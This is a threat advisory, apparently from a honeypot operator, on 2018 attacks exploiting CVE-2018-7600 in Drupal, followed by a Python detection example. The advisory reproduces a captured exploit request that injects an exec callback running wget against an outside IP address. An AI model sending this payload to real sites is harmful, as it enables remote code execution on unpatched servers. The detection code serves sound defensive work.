Date of Detection:
2018.3.29
Attack Pattern:
- URI:
/user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax
- Request Body:
form_id=user_register_form&_drupal_ajax=1&mail%5B%23post_render%5D%5B%5D=exec&mail%5B%23type%5D=markup&mail%5B%23markup%5D=wget%20http%3A%2F%2F51.254.219.134%2Fdrupal.php
Target System:
Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code.
Analysis:
This issue is not a zero-day vulnerability; it has been assigned CVE-2018-7600. However, attackers are scanning and attacking a large portion of CloudCoffer's worldwide honeypots. That means any system that has not been updated is in a dangerous situation.
Please note that the payload carried in the request body differs from request to request.
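Detection example:
Because the payload changes between requests, a log or WAF check is more reliable when it matches the structure of the request rather than the command it carries. The following is an added example, not part of the original advisory: it flags any form parameter whose bracketed key begins with '#', which is broader than the three property names in the captured request. The function name and the sample requests are constructed for illustration, and the command value is replaced by a placeholder.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# A bracketed key that starts with '#', e.g. mail[#post_render][].
# Assumption: legitimate form submissions never send such parameter names.
HASH_KEY = re.compile(r"\[(#[A-Za-z_]+)\]")


def match_reasons(uri, body):
    """Return the reasons a request matches the pattern (empty list = no match)."""
    reasons = []

    # parse_qsl percent-decodes names and values, so %23 becomes '#'.
    query = dict(parse_qsl(urlsplit(uri).query, keep_blank_values=True))
    if "#" in query.get("element_parents", ""):
        reasons.append("element_parents points at a '#' property")

    for name, _value in parse_qsl(body, keep_blank_values=True):
        hit = HASH_KEY.search(name)
        if hit:
            # Only the parameter name is inspected; the value is ignored.
            reasons.append("body parameter sets " + hit.group(1))
    return reasons


# Constructed samples. The first mirrors the parameter names in the Attack
# Pattern above with the command replaced by a placeholder string.
SAMPLE_URI = ("/user/register?element_parents=account/mail/%23value"
              "&ajax_form=1&_wrapper_format=drupal_ajax")
SAMPLE_BODY = ("form_id=user_register_form&_drupal_ajax=1"
               "&mail%5B%23post_render%5D%5B%5D=exec"
               "&mail%5B%23type%5D=markup"
               "&mail%5B%23markup%5D=PLACEHOLDER_COMMAND")
BENIGN_URI = "/user/register"
BENIGN_BODY = "form_id=user_register_form&name=alice&mail=alice%40example.com"

if __name__ == "__main__":
    for label, uri, body in (("sample", SAMPLE_URI, SAMPLE_BODY),
                             ("benign", BENIGN_URI, BENIGN_BODY)):
        print(label, match_reasons(uri, body))
```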